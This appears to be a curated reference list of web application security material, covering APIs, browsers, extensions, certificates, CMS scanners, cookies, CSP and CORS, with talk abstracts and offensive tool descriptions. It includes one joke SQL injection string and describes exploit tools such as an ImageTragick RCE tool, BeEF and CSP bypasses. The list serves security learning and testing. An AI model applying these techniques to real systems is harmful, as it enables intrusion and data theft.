- General
- Purposely Vulnerable Web Apps -> See 'Building a Lab' page.
- Standards & Technologies
- Attacks & Techniques
- 101
- APIs
- (Web) Browsers
- Backend X(Image/PDF/etc) Processing
- Cascading Style Sheets
- Certificates & Cert Transparency
- CMS Specific
- Cookies & Tokens
- Content Security Policy(CSP)
- Common Origin Resource Sharing (CORS)
- Cookies
- Document Object Model(DOM)
- Edge Side Include
- Electron
- Encoding
- FIDO2
- File System Access API
- Flash/SWF
- GhostScript
- GraphQL
- HTML
- Hyper Text Transport Protocol (HTTP)
- Imagemagick
- Java & Associated
- JavaScript
- JavaScript Frameworks
- .NET-based Frameworks
- Python-baed Frameworks
- JSON
- JSON Web Tokens
- MIME Sniffing
- NodeJS
- OAuth
- Parsers
- PASETO
- PHP
- Protocol Buffers
- Robots.txt
- RPC-related
- Ruby
- SAML
- Same-Origin-Policy
- Security Assertion Markup Language (SAML))
- Service Workers
- Site Isolation
- SubResource Integrity
- Secure Sockets Layer/Transport Layer Security
- SSL/TLS
- Single Sign-On
- Streams
- Unicode
- Uniform Resource Identifier/Locator(URIs/URLs)
- Web Application Firewalls(WAFs)
- Web Assembly
- WebAuthentication
- WebBluetooth
- Web Hooks
- WebNFC
- Web Proxies & Middleware
- WebRTC
- Web Servers
- WebSockets
- Web Storage
- WebUSB
- Tactics
- Guides & Methodologies
- General Reconnaissance - Fix toc section
- Attacks
- Abuse of Functionality
- Backend File Parsing/Processing - fix
- Brute Force/Fuzzing/Directory Discovery
- Cache-based Attacks - Fix
- CSV injection
- ClickJacking
- Cross Protocl Sripting/Request Attack
- Cross Site Content Hijaacking
- Cross-Site History Manipulation (XHSM)
- Cross-Site-Request Forgery
- Cross-Site-Scripting (XSS)
- Cascading StyleSheets Injection
- Cross Site WebSocket Hijacking)
- Data Structure Attacks
- Edge Side Include Injection
- Embedded Malicious Code
- Exploitation of Authentication
- Execution after Redirect
- File Upload Testing
- (Attacking) Frameworks
- Fuzzing
- HTML Smuggling
- HTTP Request Smuggling
- Image-based Exploitation AKA Exploiting Polyglot features of File standards
- IDN Homgraph Attacks - Font Deception
- Insecure Direct Object Reference
- Injection Based Attacks
- LFI & RFI
- Log4J
- Logic Flaws
- OS Command Injection
- JNDI
- Password Bruteforcing
- Path Confusion Attacks
- Path Traversal Attacks
- Prototype Pollution Attack
- Reflected File Download
- Relative Path Overwrite
- Serialization Attacks
- Site Imaging
- (NO)SQL Injection
- Server Side Request Forgery
- Server Side Include
- Server Side Template Injection
- Subdomain Hijack
- Tabnabbing
- Timing-based Attacks/Data Race Attacks
- TLS Redirection (and Virtual Host Confusion)
- Typosquatting
- Web Cache Poisoning Attack
- Web Shells
- XML-based Attacks
- Miscellaneous
- Application Specific/Vendor Specific
- To Do 2. backlog 3. TLS 4. HTTP2/3 5. XSS 6. XSSI 7. XXE
- 101
- Things to Know
- OWASP Application Security Verification Standard
- "The primary aim of the OWASP Application Security Verification Standard (ASVS) Project is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard. The standard provides a basis for testing application technical security controls, as well as any technical security controls in the environment, that are relied on to protect against vulnerabilities such as Cross-Site Scripting (XSS) and SQL injection. This standard can be used to establish a level of confidence in the security of Web applications."
- OWASP Top Ten Project
- The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
- The Website Obesity Crisis
- XSS, CSRF, CSP, JWT, WTF? IDK
¯\_(ツ)_/¯
- Dominik Kundel(JSConf Iceland2018)Robert'); DROP TABLE Students;--
The little Bobby Tables is embodying the classical fear of SQL injections when building web applications. However, SQL injections are just one aspect of things we need to worry about when building web applications. With the recent popularity of Angular, React and other Single Page Application frameworks we got more logic executing on the front-end create new problems and make you forget about others. In this talk you will learn about XSS, CSRF, CORS, JWT, HTTPS, SPAs, REST APIs and other weird abbreviations, how to protect yourself and your users from the new generation of Bobby Tables.
- OWASP Application Security Verification Standard
- Articles
- Things to Know
- Browsers
- Browser-2020
- Things you can do with a browser in 2020
- It's like, did no one read 'The Tangled Web: A Guide to Securing Modern Web Applications'? Or did they, and their take away was, 'Man, what a bunch of great ideas! Blinking text with no user control? Woah. I'm so on this.'.
- My point is that it is 2020, and there is no equivalent to NoScript or UBlock Origin in any major browser. Despite this, I can have picture in picture video chats, while also connecting by bluetooth and USB, devices to the browser and having each tab color coded, along with the browser knowing my power level of my device, all according to standards.
- It's 2020, still no equivalent of NoScript or UBlock Origin available by default in any of the major browsers.
- Yet, I can share files with others, using a contextual menu depending on installed applications, or I can give my browser access to my insecure USB and Bluetooth devices, while it makes sure my battery isn't dead from the power consumption while the containing tabs for each webapp are properly color coded. 🤔
- Google released a paper the day after I made this comment. I stand by my comment.
- Oh, the Places You’ll Go! Finding Our Way Back from the Web Platform’sIll-conceived Jaunts - Artur Janc, Mike West(2020)
- In this paper, we start from a scattered list of concrete grievances about the web platform based on informal discussions among browser and web security engineers. After reviewing the details of these issues, we work towards amodel of the root causes of the problems, categorizing them based on the type of risk they introduce to the platform. We then identify possible solutions for each class of issues, dividing them by the most effective approach to address it. In the end, we arrive at a general blueprint for backing out of these dead ends. We propose a three-pronged approach which includes changing web browser defaults, creating aslew of features for web authors to opt out of dangerous behaviors, and adding new security primitives. We then show how this approach can be practically applied to address each of the individual problems, providing a conceptual framework for solving unsafe legacy web platform behaviors.
- How Browsers Work: Behind the scenes of modern web browsers - Tali Garsiel, Paul Irish(2011)
- Browser-2020
- Authentication
- Articles
* A Dive Into Web Application Authentication - James Chiapetta(2022)
* Auth-Boss
* 🔒 Become an Auth Boss. Learn about different authentication methodologies on the web.
- Talks/Presentations
- Articles
* A Dive Into Web Application Authentication - James Chiapetta(2022)
* Auth-Boss
* 🔒 Become an Auth Boss. Learn about different authentication methodologies on the web.
- Authorization
- Articles
- Session Management
- Cheat Sheets
- See 'Cheats.md' for cheatsheets
- Tools
-
101
- OWASP API Security Project
- WebSocket API Standards
- API Throwdown: RPC vs REST vs GraphQL - Nate Barbettini(Iterate 2018)
- Choosing an API design style can be downright daunting. The RPC vs. REST debate has raged for years, and now there's a new kid on the block: GraphQL. Which is right for your application? I'll demystify these API styles in clear terms and help you decide how to design your API.
- A brief look at the evolution of interface protocols leading to modern APIs - Luis Augusto Weir(2019)
-
Reference
- White House Web API Standards
- This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
- OpenAPI
- The OpenAPI Specification
- The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
- What Is OpenAPI?
- Kiota
- "Kiota is a command line tool for generating an API client to call any OpenAPI described API you are interested in. The goal is to eliminate the need to take a dependency on a different API SDK for every API that you need to call. Kiota API clients provide a strongly typed experience with all the features you expect from a high quality API SDK, but without having to learn a new library for every HTTP API."
- The OpenAPI Specification
- White House Web API Standards
-
Building
-
Securing
- General
- OWASP API Security Project
- OWASP API Security Top 10
- API Security Checklist
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- API Maturity model
- Code Patterns for API Authorization: Designing for Security - Tanner Prynn(2020)
- "This post describes some of the most common design patterns for authorization checking in web application code. Comparisons are made between the design patterns to help understand when each pattern makes sense as well as the drawbacks of the pattern. For developers and architects, this post helps you to understand what the different code patterns look like and how to choose between them. For security auditors, the most effective approaches to auditing authorization controls are explained based on which pattern the code uses."
- Code Patterns for API Authorization: Designing for Security - Tanner Prynn(2020
- Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities - Matt Tesauro(2022)
- Talks & Presentations
- BOLA, IDOR, MA, BFLA. Welcome to the OWASP API Top 10! - Adam Fisher(BSidesSLC 2020)
- API Security: Tokens, Flows and the Big Bad Wolf - Ingy Youssef(BSidesColombus(2019))
- OAuth Flows, OpenID Connect, tokens, nonces, gateways & all the fun API stuff. Well, there's always a big bad wolf, and APIs have lots of targets. Digital Transformations are rolling out more and more APIs, yesterday is different than today, the security model is changing, but in what ways? We need to secure APIs and be enablers of change and lock out the big bad wolf.
- General
-
Testing
- General
- Security testing guide for JSON / REST APIs #1/3 - Ivan Novikov
- Simplifying API Pentesting With Swagger Files - David Yesland
- Exploring Service APIs Through Test Automation - Amber Race(2020)
- API-Security-Empire
- How to Hack APIs in 2021 - Hakluke, Farah Hawa(2021)
- MindAPI
- "Organize your API security assessment by using MindAPI. It's free and open for community collaboration."
- How to Detect the Programming Language of an API - Dana Epp(2022)
- An API Security Testing Checklist… with a twist - Dana Epp(2023)
- 5 simple questions to make your API pentest more successful - Dana Epp(2023)
- How I fuzz and hack APIs? - Inderjeet Singh(2023) Testing of
- Talks/Presentations
- Fundamentals of Hacking Web API's - Charles Shirer
- Penetration testing Web API's can be difficult without an effective approach, so Charles Shirer is here to provide you with a few tips and tricks! Charles breaks down the fundamentals of hacking Web API's and the methodology that he has used during his career to perform successful and effective Web API penetration tests over the years.
- API hacking for the Actually Pretty Inexperienced hacker with Katie Paxton-Fear(OWASP DevSlop)
- API Security: Tokens, Flows and the Big Bad Wolf - Ingy Youssef(BSidesColombus(2019))
- OAuth Flows, OpenID Connect, tokens, nonces, gateways & all the fun API stuff. Well, there's always a big bad wolf, and APIs have lots of targets. Digital Transformations are rolling out more and more APIs, yesterday is different than today, the security model is changing, but in what ways? We need to secure APIs and be enablers of change and lock out the big bad wolf.
- Hacking APIs:Workshop - Corey Ball(2022)
- Fundamentals of Hacking Web API's - Charles Shirer
- Postman
- Insomnia
- Insomnia - Kong
- Insomnia is a cross-platform REST client, built on top of Electron.
- Getting Started API Penetration Testing with Insomnia - Mic Whitehorn-Gillam(2020)
- Insomnia - Kong
- General
-
- Talks/Presentations/Videos
- **Tools
- restler-fuzzer
- "RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services."
- Fuzzapi
- Fuzzapi is rails application which uses API_Fuzzer and provide UI solution for gem.
- API-fuzzer
- API Fuzzer which allows to fuzz request attributes using common pentesting techniques and lists vulnerabilities
- Automatic API Attack Tool - Imperva
- "Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output. The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in the API specification. Each endpoint is injected with cleverly generated values within the boundaries defined by the specification, and outside of it, the appropriate requests are sent and their success or failure are reported in a detailed manner. You may also extend it to run various security attack vectors, such as illegal resource access, XSS, SQLi and RFI, that are targeted at the existing endpoints, or even at non-existing ones. No human intervention is needed. Simply run the tool and get the results."
- restler-fuzzer
-
GraphQL
- See GraphQL section below.
-
REST
- 101
- Talks/Presentations/Videos
- Introduction to RESTful APIs with Chris Wahl
- Cracking and fixing REST services - Bill Sempf - Converge 2015
- REST, or Representational State Transfer, just refers to the protocol with which the whole Web works. No big. We are used to using REST with a browser, but there is more to it - we can write programs with REST. The problem is that writing properties and functions using the web's transfer protocol open them up to all of the security weaknesses of the web, and we know there are a few of those. Finding those bugs is just half of the battle - fixing them is a whole other story. You'll need the details, and you'll get them here.
- Deconstructing REST Security by David Blevins(DevoxxUSA2017)
- With an aggressive distaste for fancy terminology, this session delves into OAuth 2.0 as it pertains to REST and shows how it falls into two camps: stateful and stateless. The presentation also details a competing Amazon-style approach called HTTP Signatures and digs into the architectural differences of all three, with a heavy focus on the wire, showing actual HTTP messages and enough detail to have you thinking, “I could write this myself.”
- Attacking
- Tools
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
- Susanoo
- Susanoo is a REST API security testing framework.
- restler-fuzzer
- "RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services."
- Astra
-
- Learning/Reference
- 101
- Microservices
- Service-Oriented-Architecture
- The S stands for Simple
- Satire(Only it's not) of a conversation about SOAP
- 101
- Talks & Presentations
- Tools
- WS-Attacker
- WS-Attacker is a modular framework for web services penetration testing. It is developed by the Chair of Network and Data Security, Ruhr University Bochum (http://nds.rub.de/ ) and the Hackmanit GmbH (http://hackmanit.de/).
- Damn Vulnerable Web Services dvws
- Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.
- WS-Attacks.org
- WS-Attacks.org is not a new web service standard by the OASIS Group or W3C; instead it presents the flaws of today's web service standards and implementations in regard to web service security! WS-Attacks.org aims at delivering the most comprehensive enumeration of all known web service attacks.
- WS-Attacker
- Learning/Reference
- Reference
- Tools
- Postman - chrome plugin
- restclient - Firefox addon
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
- mitmproxy2swagger
- A tool for automatically converting mitmproxy captures to OpenAPI 3.0 specifications. This means that you can automatically reverse-engineer REST APIs by just running the apps and capturing the traffic.
- REST-Attacker
- REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
- Images
- 101
- Articles/Blogposts/Writeups
- ImageTragick/ImageMagick Is On Fire: CVE-2016–3714
- Playing with ImageTragick like it's 2016 - Alexis Danizan, Clément Amic(2021)
- ImageTragick: A Tragick Image Conversion Tale - INE
- ImageMagick - Shell injection via PDF password - Alex Infuhr(2020)
- ImageMagick: The hidden vulnerability behind your online images - Bryan Gonzalez(2022)
- Papers
- Presentations/Talks/Videos
- Tools
- imagetragick
- A tool to exploit imagetragick vulnerability to gain remote code execution.
- CVE-2022-44268 Arbitrary File Read PoC - PNG generator
- This is a proof of concept of the ImageMagick bug discovered by https://www.metabaseq.com/imagemagick-zero-days/
- imagetragick
- PDFs
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Browsers
- 101
- Articles/Blogposts/Writeups
- Papers
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Abstract: Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
- How do we Stop Spilling the Beans Across Origins? - A primer on web attacks via cross-origin information leaks and speculative execution - aaj@google.com, mkwst@google.com
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Presentations/Talks/Videos
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- When surfing the web, browsers download and execute arbitrary JavaScript code they receive from websites they visit. What if high-traffic websites served obfuscated code that secretly borrowed clock cycles from their client’s web browser as a means of distributed computing? In this talk I present research on the topic of using web browsers as zero-configuration, trojan-less botnets. The presentation includes a brief history of botnets, followed by an overview of techniques to build and deploy command-and-control botnet clients that run in-browser.
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- Tools
- Chrome Specific
- Chromium Sandbox
- Sandbox leverages the OS-provided security to allow code execution that cannot make persistent changes to the computer or access information that is confidential. The architecture and exact assurances that the sandbox provides are dependent on the operating system. This document covers the Windows implementation as well as the general design.
- Chromium Cross-Origin Read Blocking (CORB)
- Chromium Sidechannel Threat Model: Post-Spectre Threat Model Re-Think(2018)
- Security analysis of
<portal>
element - Michal Bentkowski
- Chromium Sandbox
- Firefox Specific
- Safari Specific
- Browser Extensions
- Articles/Blogposts/Writeups
- Attacking Browser Extensions
- Botnet in the Browser: Understanding Threats Caused by Malicious Browser Extensions
- An in-depth look into Malicious Browser Extensions(2014)
- Game of Chromes: Owning the Web with Zombie Chrome Extensions - DEF CON 25 - Tomer Cohen
- Chrome-botnet
- Malware in the browser: how you might get hacked by a Chrome extension(2016) - Maxime Kjaer
- I Sold a Chrome Extension but it was a bad decision - Amit Agarwal
- Detecting Installed Extensions (Edge)(2017) - brokenbrowser.com
- Finding Browser Extensions To Hunt Evil!(2016) - Brad Antoniewicz
- Sparse Bruteforce Addon Detection(2011) - James Kettle
- Intro to Chrome addons hacking: fingerprinting(2012) - kotowicz
- No Place Like Chrome - xorrior
- Democratizing Chrome Extension Security - Duo Security(2018)
- Kicking the Rims – A Guide for Securely Writing and Auditing Chrome Extensions - Matthew Bryant(2018)
- Anatomy of a basic extension - Wladimir Palant(2022)
- Yes, fun browser extensions can have vulnerabilities too! - Wladimir Palant(2021)
- Hidden in plain sight: the risks of browser extensions - multilogin.com(2021)
- Talks & Presentations
- Offensive Browser Extension Development - Michael Weber(Derbycon7
- For the past few years, malware authors have abused the extension development functionality of Chrome and Firefox. More often than not, these extensions are abused for standard crimeware activities, such as ad click fraud, cryptocurrency mining, or stealing banking credentials. But this is only scratching the surface of what is possible if the appropriate browser APIs are abused. Extensions can act as a foothold into a target's internal network, provided a single user can be convinced to click two buttons. As a post-exploitation mechanism, extensions can be side-loaded with the ability to read and write files to disk. These actions will all be performed from the browser process(es) and likely go undetected by conventional endpoint protection solutions. This talk will discuss the creation, deployment, and usage of malicious browser extensions so that other red teamers can add this attack vector to their toolkit.
- Offensive Browser Extension Development - Michael Weber(Derbycon7
- Chrome Specific
- Firefox Specific
- Papers
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well to report to antimalware and browser vendors.
- Paper
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- Tools
- extension_finder
- Python and PowerShell utilities for finding installed browser extensions, plug-ins and add-ons
- CSS Keylogger
- Chrome extension and Express server that exploits keylogging abilities of CSS.
- tarnish
- tarnish is a static-analysis tool to aid researchers in security reviews of Chrome extensions.
- CRXcavator
- CRXcavator automatically scans the entire Chrome Web Store every 3 hours and produces a quantified risk score for each Chrome Extension based on several factors. These factors include permissions, inclusion of vulnerable third party javascript libraries, weak content security policies, missing details from the Chrome Web Store description, and more. Organizations can use this tool to assess the Chrome Extensions they have installed and to move towards implementing explicit allow (whitelisting) for their organization.
- extension_finder
- Articles/Blogposts/Writeups
- Exploiting
- Smashing The Browser: From Vulnerability Discovery To Exploit
- Goes from introducing a fuzzer to producing an IE11 0day
- The Birth of a Complete IE11 Exploit Under the New Exploit Mitigations
- BeEF Browser Exploitation Framework
- BeEF
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
- Browsers Gone Wild - Angelo Prado & Xiaoran Wang - BHAsia2015
- In this talk, we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache/timing side channels to extract secrets from third-party domains, and leverage new HTML5 features to carry out more stealthy attacks. This is a practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today's web clients.
- Smashing The Browser: From Vulnerability Discovery To Exploit
- 101
- Certificates
- Certificate Revocation
- Certificate Pinning
- Certificate Transparency
- 101
- Certificate.transparency.dev
- Certificate Transparency - Mozilla
- "Certificate Transparency is an open framework designed to protect against and monitor for certificate mis-issuances. It's defined in RFC 9162. With certificate transparency, newly-issued certificates are 'logged' to publicly-run, often independent CT logs — which maintain an append-only, cryptographically-assured record of issued TLS certificates."
- Certificate Transparency- Digicert
- Talks/Presentations/Videos
- HTTP Strict Transport Security
- Domain Validation
- Let's Attack Let's Encrypt - Haya Shulman
- Slides
- In this work we show that two central design issues of the distributed domain validation of Let’sEncrypt make it vulnerable to downgrade attacks...
- Let's Attack Let's Encrypt - Haya Shulman
- Tools
- CTFR
- Do you miss AXFR technique? This tool allows to get the subdomains from a HTTPS website in a few seconds. How it works? CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
- Certificate Transparency Subdomains
- An hourly updated list of subdomains gathered from certificate transparency logs.
- CertSpotter
- Cert Spotter is a Certificate Transparency log monitor from SSLMate that alerts you when a SSL/TLS certificate is issued for one of your domains. Cert Spotter is easier than other open source CT monitors, since it does not require a database. It's also more robust, since it uses a special certificate parser that ensures it won't miss certificates.
- CRTScan
- Scan subdomains from certificate transparency logs
- ctexposer
- An OSINT tool that discovers sub-domains by searching Certificate Transparency logs
- CTFR
- Agnostic
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- w3af
- w3af: web application attack and audit framework, the open source web vulnerability scanner.
- WhatWeb
- Adobe Experience Manager
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- aem-hacker
- Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
- aem-hacker
- ColdFusion
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Drupal
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Drupal Attack Scripts
- Set of brute force scripts and Checklist
- Droopescan
- A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
- Drupal Attack Scripts
- Joomla
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- JoomScan
- Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
- JScanner
- Analyze target Joomla! installation using several different techniques.
- JoomlaVS
- JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
- JoomScan
- Sharepoint
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Sparty - Sharepoint/Frontpage Auditing Tool
- Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
- Sparty - Sharepoint/Frontpage Auditing Tool
- Wordpress
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- 101
- HTTP cookie - Wikipedia
- Using HTTP cookies - MDN(Mozilla)
- All About Cookies.org
- Cookiedatabase
- "On Cookiedatabase.org you can consult information about cookies, Local Storage, pixels and other tracking technologies. You can also read the Data Passports we created about the services and organizations that create or use these technologies."
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Baking Your Anomalous Cookies - Jim Allee(NolaCon2019)
- I hacked Fortnite! Actually it was a vulnerable cookie found on several domains owned by Epic Games that allowed me to hijack traffic of users of their websites, steal session tokens and of course, BeEF hook em'. I will describe my journey from creating a custom cookie fuzzing tool (Anomalous Cookie) to help identify vulnerable cookies, to creating a framework for 'Cookie Baking'. Cookie Baking is the technique of creating or modifying a cookie in a users' local Cookie Jar (this includes stuffing with malicious payloads, affiliate tags, fuzz-strings and more). I will also provide insight into the Bug Bounty process, how Google responded to my request for them to protect local cookies at rest, and how I created WHID-Injected Cookies! ;)
- Got Cookies? Exploiting Vulnerabilities in Cookie Based Authentication - Harsh Bothra(Mayhem2021 RTV)
- Abstract: Cookies are a widely used way to enable authentication in many of the applications out there. Over time, there has been a lot of security implications in Cookie-Based Authentication and new methods such as token-based authentication has entered the picture. Although many modern applications are adapting Token-Based authentication, Cookie-Based Authentication is still alive and can be observed in the wild. In this talk, we will look at various attack scenarios that can be exploited in the wild if the application is using cookies for authentication, tracking, personalization, or some value reflections.
- Baking Your Anomalous Cookies - Jim Allee(NolaCon2019)
- Papers
- Tools
- CookieMonster
- Blogpost
- 🍪 CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.
- CookieMonster
- JWTs
- 101
- Articles
- Talks
- Tools
- MyJWT
- A cli for cracking, testing vulnerabilities on Json Web Token(JWT)
- jwt-fuzzer
- jwt-fuzzer is a simple command line tool that creates multiple, potentially invalid, strings from an initial JSON Web Token.
- MyJWT
- PASETO
- SameSite
- Strict-Transport-Security
- [Strict-Transport-Security - MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
- 101
- Articles/Papers/Talks/Writeups
- Content Security Policy - An Introduction - Scott Helme(2014)
- GitHub's post-CSP journey - githubengineering
- CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox - Masato Kinugawa
- CSP and SVG - c0nrad
- "The tl;dr is make sure object-src is ‘none’ if you’re not using it. Using this “attack” you can reflect SVGs to get execution even in a CSP controlled environment. This is just another recipe to add to your books for bypassing CSP (insecure directives, JSONP, base offset, encoding)."
- Host a web app on Twitter in a single Tweet - @mikeptweet(2017)
- Content Security Policy (CSP) Bypasses - ghostlulz
- How To Bypass CSP By Hiding JavaScript In A PNG Image - @Menin_theMiddle
- "TL;DR - Using HTML Canvas you can hide any JavaScript code (or an entire library) into a PNG image by converting each source code character into a pixel. The image can then be uploaded onto a trusted website like Twitter or Google (usually whitelisted by CSP) and then loaded as a remote image in a HTML document. Finally, by using the canvas getImageData method, it's possible to extract the "hidden JavaScript" from the image and execute it. Sometimes this could lead to a Content-Security-Policy bypass making an attacker able to include an entire and external JavaScript library."
- Content-Security-Policy (CSP) Bypass Techniques - Bhavesh Thakur(2020)
- Hunting nonce-based CSP bypasses with dynamic analysis - Gareth Hayes(2021)
- Bypass CSP? No problem - Okhonko Philipp(2021)
- Tools
- JSONBee
- A ready to use JSONP endpoints to help bypass content security policy of different websites.
- JSONBee
- Miscellaneous
- 101
- Cross-Origin Resource Sharing (CORS) - Mozilla Dev Docs
- CORS Findings: Another Way to Comprehend - Ryan Leese
- Same Origin Policy - dev.mozilla
- Same Origin Policy - W3C
- Cross-Origin Resource Sharing (CORS) - dev.mozilla
- Cross-Origin Resource Sharing - w3.org
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on
http://example.org
resources, a resource onhttp://hello-world.example
can opt in using the mechanism described by this specification (e.g., specifyingAccess-Control-Allow-Origin: http://example.org
as response header), which would allow that resource to be fetched cross-origin fromhttp://example.org
.
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on
- Private Network Access(aka CORS-RFC1918) - W3C(2022)
- This document specifies modifications to Fetch and HTML which are intended to mitigate the risks associated with unintentional exposure of devices and servers on a client’s internal network to the web at large.
- Articles/Blogposts/Writeups
- JSON API's Are Automatically Protected Against CSRF, And Google Almost Took It Away.
- Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy
- Arbitrary Reflected Origin - Evan J(2016)
- Do You Really Know CORS? - Grzegorz Mirek
- 3 Ways to Exploit Misconfigured Cross-Origin Resource Sharing (CORS) - Pavan Kumar J(2018)
- Three C-Words of Web App Security: Part 1 – CORS - Mic Whitehorn-Gillam(2018)
- [CORS Findings: Another Way to Comprehend - Ryan Leese(2018)
- Same-Origin Policy: From birth until today - Alex Nikolova(2019)
- "In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser’s Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511, CVE-2019-5814 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera which allows stealing sensitive images via Cross-Site Request Forgery (CSRF)."
- Cross-Origin Resource Sharing (CORS) - Ghostlulz
- How do we Stop Spilling the Beans Across Origins? A primer on web attacks via cross-origin information leaks and speculative execution - aaj@google.com, mkwst@google.com(2022)
- Exploiting CORS Misconfigurations - attack ships on fire(2022)
- Cross-Origin Resource Sharing (CORS) | Complete Guide - Rana Khalil(2022)
